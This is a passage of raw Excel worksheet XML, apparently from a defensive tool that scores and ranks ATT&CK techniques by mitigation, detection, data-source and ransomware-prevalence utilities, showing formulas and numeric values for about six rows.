        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.3</v>
      </c>
      <c r="L378" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="M378" s="37">
        <v>0.62304999999999999</v>
      </c>
      <c r="N378" s="56">
        <v>0</v>
      </c>
      <c r="O378" s="56">
        <v>1</v>
      </c>
      <c r="P378" s="56">
        <v>2</v>
      </c>
      <c r="Q378" s="56">
        <v>3</v>
      </c>
      <c r="R378" s="57" t="s">
        <v>1329</v>
      </c>
      <c r="S378" s="57">
        <v>11</v>
      </c>
      <c r="T378" s="57" t="s">
        <v>1330</v>
      </c>
      <c r="U378" s="57">
        <v>21</v>
      </c>
      <c r="V378" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.33333323809523807</v>
      </c>
      <c r="W378" s="37">
        <v>32</v>
      </c>
      <c r="X378" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Y378" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Z378" s="37">
        <v>6</v>
      </c>
      <c r="AA378" s="37">
        <v>0.06</v>
      </c>
      <c r="AB378" s="37">
        <v>0.06</v>
      </c>
      <c r="AC378" s="37"/>
      <c r="AD378" s="50" t="s">
        <v>1331</v>
      </c>
      <c r="AE378" s="37" t="str" cm="1">
        <f t="array" ref="AE378">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD378)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF378" s="37">
        <v>374</v>
      </c>
      <c r="AG378" s="37" t="str" cm="1">
        <f t="array" ref="AG378">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD378)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH378" s="37">
        <v>374</v>
      </c>
      <c r="AI378" s="37" t="str" cm="1">
        <f t="array" ref="AI378">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD378)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ378" s="37">
        <v>374</v>
      </c>
      <c r="AK378" s="37" t="str" cm="1">
        <f t="array" ref="AK378">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD378)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL378" s="37">
        <v>374</v>
      </c>
      <c r="AM378" s="37" t="str" cm="1">
        <f t="array" ref="AM378">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD378)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN378" s="37">
        <v>0</v>
      </c>
      <c r="AO378" s="37">
        <v>2</v>
      </c>
      <c r="AP378" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ378" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>651.88523580952381</v>
      </c>
      <c r="AR378" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS378" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT378" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU37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31.089773133786846</v>
      </c>
    </row>
    <row r="379" spans="1:47" ht="34">
      <c r="A379" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B379" s="37">
        <f t="shared" si="5"/>
        <v>786.23830966666662</v>
      </c>
      <c r="C379" s="37" t="s">
        <v>1332</v>
      </c>
      <c r="D379" s="50" t="s">
        <v>1328</v>
      </c>
      <c r="E379" s="37" t="s">
        <v>1333</v>
      </c>
      <c r="F379" s="37">
        <v>1</v>
      </c>
      <c r="G379" s="37">
        <v>1</v>
      </c>
      <c r="H379" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I379" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J379" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K379" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L379" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M379" s="37">
        <v>0</v>
      </c>
      <c r="N379" s="56">
        <v>3</v>
      </c>
      <c r="O379" s="56">
        <v>48</v>
      </c>
      <c r="P379" s="56">
        <v>11</v>
      </c>
      <c r="Q379" s="56">
        <v>13</v>
      </c>
      <c r="R379" s="57" t="s">
        <v>141</v>
      </c>
      <c r="S379" s="57">
        <v>3</v>
      </c>
      <c r="T379" s="57" t="s">
        <v>584</v>
      </c>
      <c r="U379" s="57">
        <v>4</v>
      </c>
      <c r="V379" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.42380966666666664</v>
      </c>
      <c r="W379" s="37">
        <v>7</v>
      </c>
      <c r="X379" s="37">
        <v>0.127273</v>
      </c>
      <c r="Y379" s="37">
        <v>0.127273</v>
      </c>
      <c r="Z379" s="37">
        <v>75</v>
      </c>
      <c r="AA379" s="37">
        <v>0.75</v>
      </c>
      <c r="AB379" s="37">
        <v>0.75</v>
      </c>
      <c r="AC379" s="37"/>
      <c r="AD379" s="50" t="s">
        <v>1334</v>
      </c>
      <c r="AE379" s="37" t="str" cm="1">
        <f t="array" ref="AE379">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD379)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF379" s="37">
        <v>375</v>
      </c>
      <c r="AG379" s="37" t="str" cm="1">
        <f t="array" ref="AG379">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD379)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH379" s="37">
        <v>375</v>
      </c>
      <c r="AI379" s="37" t="str" cm="1">
        <f t="array" ref="AI379">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD379)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ379" s="37">
        <v>375</v>
      </c>
      <c r="AK379" s="37" t="str" cm="1">
        <f t="array" ref="AK379">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD379)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL379" s="37">
        <v>375</v>
      </c>
      <c r="AM379" s="37" t="str" cm="1">
        <f t="array" ref="AM379">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD379)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN379" s="37">
        <v>0</v>
      </c>
      <c r="AO379" s="37">
        <v>2</v>
      </c>
      <c r="AP379" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ379" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>262.07943655555556</v>
      </c>
      <c r="AR379" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS379" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT379" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU37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12.527592216931215</v>
      </c>
    </row>
    <row r="380" spans="1:47" ht="51">
      <c r="A380" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="B380" s="37">
        <f t="shared" si="5"/>
        <v>781.16630833333329</v>
      </c>
      <c r="C380" s="37" t="s">
        <v>1335</v>
      </c>
      <c r="D380" s="50" t="s">
        <v>1328</v>
      </c>
      <c r="E380" s="37" t="s">
        <v>1336</v>
      </c>
      <c r="F380" s="37">
        <v>1</v>
      </c>
      <c r="G380" s="37">
        <v>1</v>
      </c>
      <c r="H380" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I380" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J380" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K380" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L380" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M380" s="37">
        <v>0</v>
      </c>
      <c r="N380" s="56">
        <v>0</v>
      </c>
      <c r="O380" s="56">
        <v>2</v>
      </c>
      <c r="P380" s="56">
        <v>4</v>
      </c>
      <c r="Q380" s="56">
        <v>32</v>
      </c>
      <c r="R380" s="57" t="s">
        <v>1176</v>
      </c>
      <c r="S380" s="57">
        <v>13</v>
      </c>
      <c r="T380" s="57" t="s">
        <v>1337</v>
      </c>
      <c r="U380" s="57">
        <v>12</v>
      </c>
      <c r="V380" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.41904738095238092</v>
      </c>
      <c r="W380" s="37">
        <v>25</v>
      </c>
      <c r="X380" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Y380" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Z380" s="37">
        <v>38</v>
      </c>
      <c r="AA380" s="37">
        <v>0.38</v>
      </c>
      <c r="AB380" s="37">
        <v>0.38</v>
      </c>
      <c r="AC380" s="37"/>
      <c r="AD380" s="50" t="s">
        <v>1338</v>
      </c>
      <c r="AE380" s="37" t="str" cm="1">
        <f t="array" ref="AE380">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD380)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF380" s="37">
        <v>376</v>
      </c>
      <c r="AG380" s="37" t="str" cm="1">
        <f t="array" ref="AG380">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD380)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH380" s="37">
        <v>376</v>
      </c>
      <c r="AI380" s="37" t="str" cm="1">
        <f t="array" ref="AI380">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD380)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ380" s="37">
        <v>376</v>
      </c>
      <c r="AK380" s="37" t="str" cm="1">
        <f t="array" ref="AK380">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD380)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL380" s="37">
        <v>376</v>
      </c>
      <c r="AM380" s="37" t="str" cm="1">
        <f t="array" ref="AM380">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD380)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN380" s="37">
        <v>0</v>
      </c>
      <c r="AO380" s="37">
        <v>4</v>
      </c>
      <c r="AP380" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="AQ380" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>260.38876944444445</v>
      </c>
      <c r="AR380" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS380" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT380" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU38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24.894168518518516</v>
      </c>
    </row>
    <row r="381" spans="1:47" ht="51">
      <c r="A381" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B381" s="37">
        <f t="shared" si="5"/>
        <v>459.88557057142862</v>
      </c>
      <c r="C381" s="37" t="s">
        <v>1339</v>
      </c>
      <c r="D381" s="50" t="s">
        <v>1328</v>
      </c>
      <c r="E381" s="37" t="s">
        <v>1340</v>
      </c>
      <c r="F381" s="37">
        <v>1</v>
      </c>
      <c r="G381" s="37">
        <v>1</v>
      </c>
      <c r="H381" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I381" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J381" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K381" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L381" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M381" s="37">
        <v>0</v>
      </c>
      <c r="N381" s="56">
        <v>0</v>
      </c>
      <c r="O381" s="56">
        <v>0</v>
      </c>
      <c r="P381" s="56">
        <v>1</v>
      </c>
      <c r="Q381" s="56">
        <v>0</v>
      </c>
      <c r="R381" s="57" t="s">
        <v>1341</v>
      </c>
      <c r="S381" s="57">
        <v>8</v>
      </c>
      <c r="T381" s="57" t="s">
        <v>1342</v>
      </c>
      <c r="U381" s="57">
        <v>13</v>
      </c>
      <c r="V381" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.20476180952380954</v>
      </c>
      <c r="W381" s="37">
        <v>21</v>
      </c>
      <c r="X381" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Y381" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Z381" s="37">
        <v>1</v>
      </c>
      <c r="AA381" s="37">
        <v>0.01</v>
      </c>
      <c r="AB381" s="37">
        <v>0.01</v>
      </c>
      <c r="AC381" s="37"/>
      <c r="AD381" s="50" t="s">
        <v>1343</v>
      </c>
      <c r="AE381" s="37" t="str" cm="1">
        <f t="array" ref="AE381">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD381)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF381" s="37">
        <v>377</v>
      </c>
      <c r="AG381" s="37" t="str" cm="1">
        <f t="array" ref="AG381">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD381)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH381" s="37">
        <v>377</v>
      </c>
      <c r="AI381" s="37" t="str" cm="1">
        <f t="array" ref="AI381">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD381)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ381" s="37">
        <v>377</v>
      </c>
      <c r="AK381" s="37" t="str" cm="1">
        <f t="array" ref="AK381">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD381)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL381" s="37">
        <v>377</v>
      </c>
      <c r="AM381" s="37" t="str" cm="1">
        <f t="array" ref="AM381">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD381)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN381" s="37">
        <v>0</v>
      </c>
      <c r="AO381" s="37">
        <v>1</v>
      </c>
      <c r="AP381" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ381" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>153.29519019047621</v>
      </c>
      <c r="AR381" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS381" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT381" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU38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3.6736950045351477</v>
      </c>
    </row>
    <row r="382" spans="1:47" ht="34">
      <c r="A382" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B382" s="37">
        <f t="shared" si="5"/>
        <v>453.90014409523809</v>
      </c>
      <c r="C382" s="37" t="s">
        <v>1344</v>
      </c>
      <c r="D382" s="50" t="s">
        <v>1328</v>
      </c>
      <c r="E382" s="37" t="s">
        <v>1345</v>
      </c>
      <c r="F382" s="37">
        <v>1</v>
      </c>
      <c r="G382" s="37">
        <v>1</v>
      </c>
      <c r="H382" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I382" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J382" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K382" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L382" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M382" s="37">
        <v>0</v>
      </c>
      <c r="N382" s="56">
        <v>0</v>
      </c>
      <c r="O382" s="56">
        <v>3</v>
      </c>
      <c r="P382" s="56">
        <v>6</v>
      </c>
      <c r="Q382" s="56">
        <v>9</v>
      </c>
      <c r="R382" s="57">
        <v>2.5</v>
      </c>
      <c r="S382" s="57">
        <v>1</v>
      </c>
      <c r="T382" s="57" t="s">
        <v>1346</v>
      </c>
      <c r="U382" s="57">
        <v>11</v>
      </c>
      <c r="V382" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.20000009523809523</v>
      </c>
      <c r="W382" s="37">
        <v>12</v>
      </c>
      <c r="X382" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Y382" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Z382" s="37">
        <v>18</v>
      </c>
      <c r="AA382" s="37">
        <v>0.18</v>
      </c>
      <c r="AB382" s="37">
        <v>0.18</v>
      </c>
      <c r="AC382" s="37"/>
      <c r="AD382" s="50" t="s">
        <v>1347</v>
      </c>
      <c r="AE382" s="37" t="str" cm="1">
        <f t="array" ref="AE382">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD382)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF382" s="37">
        <v>378</v>
      </c>
      <c r="AG382" s="37" t="str" cm="1">
        <f t="array" ref="AG382">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD382)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH382" s="37">
        <v>378</v>
      </c>
      <c r="AI382" s="37" t="str" cm="1">
        <f t="array" ref="AI382">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD382)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ382" s="37">
        <v>378</v>
      </c>
      <c r="AK382" s="37" t="str" cm="1">
        <f t="array" ref="AK382">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD382)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL382" s="37">
        <v>378</v>
      </c>
      <c r="AM382" s="37" t="str" cm="1">
        <f t="array" ref="AM382">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD382)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN382" s="37">
        <v>0</v>
      </c>
      <c r="AO382" s="37">
        <v>2</v>
      </c>
      <c r="AP382" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ382" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>151.30004803174603</v>
      </c>
      <c r="AR382" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS382" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT382" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU38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7.252383239606953</v>
      </c>
    </row>
    <row r="383" spans="1:47" ht="34">
      <c r="A383" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B383" s="37">
        <f t="shared" si="5"/>
        <v>151.70000000000002</v>
      </c>
      <c r="C383" s="37" t="s">
        <v>3791</v>
      </c>
      <c r="D383" s="50" t="s">
        <v>1328</v>
      </c>
      <c r="E383" s="37" t="s">
        <v>3792</v>
      </c>
      <c r="F383" s="37">
        <v>1</v>
      </c>
      <c r="G383" s="37">
        <v>1</v>
      </c>
      <c r="H383" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I383" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J383" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K383" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L383" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M383" s="37">
        <v>0</v>
      </c>
      <c r="N383" s="56">
        <v>0</v>
      </c>
      <c r="O383" s="56">
        <v>0</v>
      </c>
      <c r="P383" s="56">
        <v>0</v>
      </c>
      <c r="Q383" s="56">
        <v>0</v>
      </c>
      <c r="R383" s="57"/>
      <c r="S383" s="57"/>
      <c r="T383" s="57"/>
